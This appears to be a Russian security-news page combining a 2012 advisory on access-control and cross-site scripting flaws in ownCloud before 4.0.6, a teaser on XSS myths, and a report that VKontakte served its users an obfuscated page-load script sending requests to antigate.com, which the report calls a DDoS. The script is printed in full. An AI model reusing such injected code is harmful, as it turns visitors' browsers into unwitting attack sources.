Дата публикации: 29.08.2012
Опасность: Низкая
Наличие исправления: Да
Количество уязвимостей: 4
Вектор эксплуатации: Удаленная
Воздействие: Межсайтовый скриптинг
Наличие эксплоита: Нет данных
Уязвимые продукты: ownCloud 4.x

Уязвимые версии: ownCloud версий до 4.0.6

Описание:
Обнаруженные уязвимости позволяют удаленному пользователю обойти ограничения безопасности на целевой системе.

1. Уязвимость существует из-за недостаточного ограничения доступа к appconfig.php. Удаленный пользователь может подключиться к запрещенному для него функционалу.

Примечание: Уязвимость № 1 распространяется на ownCloud 4.0.5, возможно другие версии.

2. Уязвимость существует из-за недостаточной обработки входных данных. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Примечание: Уязвимость № 2 распространяется на ownCloud версий до 4.0.3.

3. Уязвимость существует из-за недостаточной обработки входных данных в календаре и контактах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Примечание: Уязвимость № 3 распространяется на ownCloud версий до 4.0.2.

4. Уязвимость существует из-за недостаточной обработки входных данных в календаре и контактах. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный код сценария в браузере жертвы в контексте безопасности уязвимого сайта.

Примечание: Уязвимость № 3 распространяется на ownCloud версий до 4.0.1.

URL производителя: http://owncloud.org/

Решение: Для устранения уязвимости установите продукт версии 4.0.6 с сайта производителя.

Ссылки: http://owncloud.org/changelog/

С учетом распространенных среди разработчиков мифов и заблуждений о межсайтовом выполнении сценариев, нет ничего удивительного в том, что он и по сегодняшний день входит в число наиболее распространенных проблем безопасности веб-приложений.

Должен признаться, что чтение комментариев на Хабре к практически любым постам, описывающим очередную XSS на каком-либо популярном сервисе или сайте, способно повергнуть в уныние любого, кто так или иначе связан с безопасностью веб-приложений. С учетом распространенных среди разработчиков мифов и заблуждений о межсайтовом выполнении сценариев, нет ничего удивительного в том, что он и по сегодняшний день входит в число наиболее распространенных проблем безопасности веб-приложений: согласно данным отчета Positive Technologies за 2010-2011 годы, XSS были подвержены 40% проанализированных веб-приложений, а из отчета Firehost за второй квартал 2012 года следует, что XSS составила 27% от числа зарегистрированных хостером атак.

И поскольку, заминусовать этот пост можно и за один только его заголовок, то поспешу пояснить: межсайтовое выполнение сценариев действительно не является уязвимостью, но только потому, что оно является атакой. В чем разница, почему это важно, как со всем этим бороться и какие еще мифы и заблуждения распространены об XSS — читаем под катом.

Социальная сеть «ВКонтакте» внедрила на все страницы сайта сценарий, осуществляющий DDoS атаку на сайт antigate.com.

Сегодня многие пользователи ВКонтакте, посетившие сайт социальной сети, могли стать невольными участниками DDoS атаки на сайт antigate.com.

На страницах пользователей загружался следующий javascript сценарий:

function _test() {
  var fr=utilsNode.appendChild(ce('iframe')),d=fr.contentWindow.document;d.open();d.write(' <script>this.location="http://ant'+'iga'+'te.com/i '+'n.php?'+'firs'+'t_an'+'d_la'+'st_wa'+'rnin'+ 'g=o'+'n";</sc'+'ript>');setTimeout(re.pbind(fr),1000);
}

<body onresize="onBodyResize()" class="is_rtl font_default" onload="_test()"> 

Этот сценарий отправлял запрос на сайт antigate.com из браузера каждого пользователя соцсети «ВКонтакте» при каждой загрузке страницы.

Подобные действия со стороны администрации «ВКонтакте» не могут радовать, и невольно поднимается вопрос о моральности и законности (ст. 274 УК РФ) подобных действий.

securitylab